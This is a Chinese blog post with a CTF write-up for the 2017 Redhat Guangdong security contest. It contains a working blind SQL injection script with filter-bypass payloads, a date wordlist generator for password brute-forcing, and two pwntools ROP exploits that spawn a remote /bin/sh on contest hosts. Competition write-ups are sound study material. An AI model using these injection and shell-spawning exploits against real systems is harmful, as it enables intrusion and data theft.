2017 Redhat广东省信息安全竞赛 Writeup

最新推荐文章于 2023-04-29 14:38:13 发布
最新推荐文章于 2023-04-29 14:38:13 发布
阅读量6.8k 收藏 2
点赞数
分类专栏: write-up 文章标签: 信息安全 red hat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31481187/article/details/71308169
版权

WEB

0x1 刮刮乐

这里写图片描述
通过文件扫描找到有文件泄露
利用Githack工具就可以把文件下下来
flag{027ea8c2-7be2-4cec-aca3-b6ba400759e8}

0x2 PHPMyWIND

这题是道综合性网站,可以查到现有的漏洞,一点都没有变
原题
这里写图片描述
根据报错注入,显示的md5找到对应的值就是密码

这里写图片描述

访问其中的flag4ae482cda6e.txt即可得到flag

0x3 后台

题目提示了有弱口令
首先生成字典

f = open('1.txt','w')
for i in range(1,13):
    for j in range(1,32):
        f.write('2017'+'0'*(2-len(str(i)))+str(i)+'0'*(2-len(str(j)))+str(j)+'\n')

利用burpsuit爆破

这里写图片描述

0x4 thinkseeker

扫一下有index.php~源代码
1、用with rollup过前面两个if
2、用盲注找到flag
关于第一点在实验吧有原题:http://www.shiyanbar.com/ctf/1940
过滤方法稍有不同,用操作符代替关键字即可。token使用变量覆盖就可以。
第二点就是infoid这个参数有盲注,跑脚本可以拿到flag。
最后贴上注入脚本

import requests
string = ''
dic = "flag{}abcdef1234567890"
for i in range(1,40):
    for j in dic:
        url="http://106.75.117.4:3083/?token=21232f297a57a5a743894a0e4a801fc3&infoid=1%0a%26%26%0aascii(substr((select%0agroup_concat(flag)%0afrom%0aflag)from({})for(1)))={}&userid=1%0a||%0a1%0agroup%0aby%0apassword%0awith%0arollup%0alimit%0a1%0aoffset%0a1&password=".format(i,ord(j))
        s=requests.get(url=url)
        content=s.content
        if "flag is in flag!" in content:
            string+=j
            break
    print string

PWN

PWN1

简单的栈溢出,通过构造rop执行system,直接写出脚本

from pwn import *
pwn1 = ELF('redhat/pwn1')
sh = remote('106.75.93.221',  10000)
padding = 'A'*(52)#长度爆出来的
system_addr = p32(pwn1.plt['system'])
scanf_addr = p32(0x08048410)
bss_addr = p32(0x0804A040)
args = p32(0x08048629)+ bss_addr
rop = p32(0x080485ee)
sh.recvline()
payload = padding+scanf_addr+rop+args+system_addr+'a'*4+bss_addr
sh.sendline(payload)
sh.sendline('/bin/sh\x00')
sh.interactive()

还有一种较为简单的方法,直接利用pwntools自带的工具

from pwn import *
#context.log_level = 'debug'
binary = ELF('./redhat/pwn1')
p = remote('106.75.93.221',  10000)
p.recvline()
rop = ROP(binary)
rop.call(0x08048410,(0x08048629, 0x0804A040))
rop.system(0x0804A040)
payload = str(rop)
p.sendline('a'*52 + payload )
p.sendline('/bin/sh')
p.interactive()
4ct10n
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
redhat红帽系统安全配置大全(英文)
03-02
Red_Hat_Enterprise_Linux-6-Security_Guide-en-US
2020-2021广东省“网络安全管理与评估”竞赛培训专题-1、赛项分析与比较
x_baigan的博客
01-17 2239
2020-2021广东省“网络安全管理与评估”竞赛培训专题-1、赛项分析与比较 文章目录2020-2021广东省“网络安全管理与评估”竞赛培训专题-1、赛项分析与比较前言一、“网络安全管理与评估”赛项分析二、与其他安全赛项的比较1.与公安口组织的比赛比较2.与世界技能大赛-网络安全比赛比较总结 前言 广东财贸职业学院首次组队参加“网络安全管理与评估”比赛,为了在比赛中取得良好的成绩,需要培训教师与学生一起共同努力,从赛项分析做起,一步步来完成目标盘 一、“网络安全管理与评估”赛项分析 “网络安全管理与
红帽linux竞赛,浅谈红帽linux挑战赛(三)
weixin_39647499的博客
05-13 909
前言当你不够强大的时候,你想要一个小小的机会,都没有;当你足够优秀的时候,你想要的一切都会主动来找你。继上文浅谈红帽linux挑战赛浅谈红帽linux挑战赛(二)继续介绍一下红帽挑战赛吧红帽是世界领先的开源解决方案供应商,依托社区力量为客户提供稳定可靠及高性能的云技术、Linux、中间件、存储和虚拟化产品。红帽还提供屡获殊荣的支持、培训和咨询服务。作为紧密连接全球企业、合作伙伴和开源社区的中心,红...
红帽大赛知识点总结
快跑快跑的博客
10-20 554
文件系统层次构 bin:存放二进制可执行文件 boot:存放系统启动文件 dev:访问硬件所需文件 etc:系统配置文件 home:用户主目录 root:超级用户目录 run:执行文件 sbin:系统管理命令 tmp:临时文件存放 usr:安装的软件,共享库,文件和静态只读程序数据 var:动态变化文件 命令行文件管理 创建目录 mkdir mkdir -p...
[360第二届大学生信息安全]WriteUp-加密解密
05-15 3894
11题: 提示:将以下二进制解密获得通关密码 010100000100101100000011000001000001010000000000000000000000000000001000000000000001010101010001101011110100011001000111111000001100000001010010001010010001010100000
2021第四届红帽杯网络安全大赛-线上赛Writeup
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
redhat 查看CPU信息
爬山虎的博客
07-07 3003
# cat /proc/cpuinfo| grep "physical id"| sort| uniq| wc -l #查看物理CPU个数 4 # cat /proc/cpuinfo| grep "cpu cores"| uniq #查看每颗物理CPU核心数 cpu cores : 22 # cat /proc/cpuinfo| grep "processor"| wc -l #查看总核心数 176 # 总逻辑CPU数 = 物理CPU个数 * 每颗物理CPU的核数 * 超线程数
redhat linux 硬件信息查看
u013305830的专栏
02-18 2855
redhat linux 硬件信息查看 查看服务器型号序列号 dmidecode|grep "System Information" -A9 查看主板型号 dmidecode | grep -A16 "System Information$" 查看bios信息 dmidecode -t bios 查看内存槽及条数 dmidecode -t memory | head -45 | tail -23 dmidecode | grep -A5 "Memory Device" | grep S
Redhat7.3安装步骤
白昼的技术专栏
06-06 7078
vmware安装redhat 8
OceanWaves1993的博客
04-29 4161
默认下一步即可默认是自动分区,会把所有空间都挂载在1个根分区下。因此修改为自定义分区选择自定义分区。
Redhat 7系统安全配置基线标准.docx
09-03
服务器操作系统Redhat 7安全基线检查标准,加固指导标准,文档中对基线加固前后进行了前后截图对照,并指出加固过程是否影响系统本身
RedHat安全加固(提高安全级别)
03-27
RedHat安全加固
redhat下基于容器安全的几个关键技术点
04-02
redhat提供的基于容器安全,在namespace、Cgroup等技术层面,简述容器安全性的策略。
ntfs-3g-ntfsprogs-2017.3.23 + redhat7.9
11-03
ntfs-3g_ntfsprogs-2017.3.23 redhat7.9 操作系统
NCTF 南京邮电大学网络攻防训练平台 WriteUp
热门推荐
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
JarvisOJ Web&Reverse&Pwn
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
百度杯CTF Write up集锦 WEB篇
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
2015广东强网杯web专题
4ct10n
09-16 3万+
2015广州强网杯1.万国码 Unicode编码转换#-*- coding : gbk -*- s=u'\u0066\u006c\u0061\u0067\u007b\u0032\u0035\u0033\u0039\u0061\u0034\u0036\u0036\u002d\u0030\u0062\u0064\u0031\u002d\u0034\u0062\u0061\u0036\u002d\u0
redhat8修改网卡信息命令
最新发布
05-20
Red Hat 8中,可以使用以下命令来修改网卡信息: 1. 使用命令 ip addr show 查看当前系统的网卡信息。 2. 使用命令 nmcli d 查看当前系统的网卡设备信息。 3. 使用命令 nmcli con show 查看当前系统的网络连接信息。 4. 使用命令 nmtui 进入TUI(文本用户界面)界面进行网卡信息的修改。 例如,要修改名为 ens33 的网卡的 IP 地址为 192.168.1.100,子网掩码为 255.255.255.0,网关为 192.168.1.1,可以使用以下命令: ``` nmcli con mod ens33 ipv4.addresses 192.168.1.100/24 nmcli con mod ens33 ipv4.gateway 192.168.1.1 nmcli con mod ens33 ipv4.method manual nmcli con up ens33 ``` 其中,ipv4.addresses 指定了 IP 地址和子网掩码,ipv4.gateway 指定了网关地址,ipv4.method 指定了 IP 地址获取方式为手动,最后一条命令 nmcli con up ens33 是启用该网卡连接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值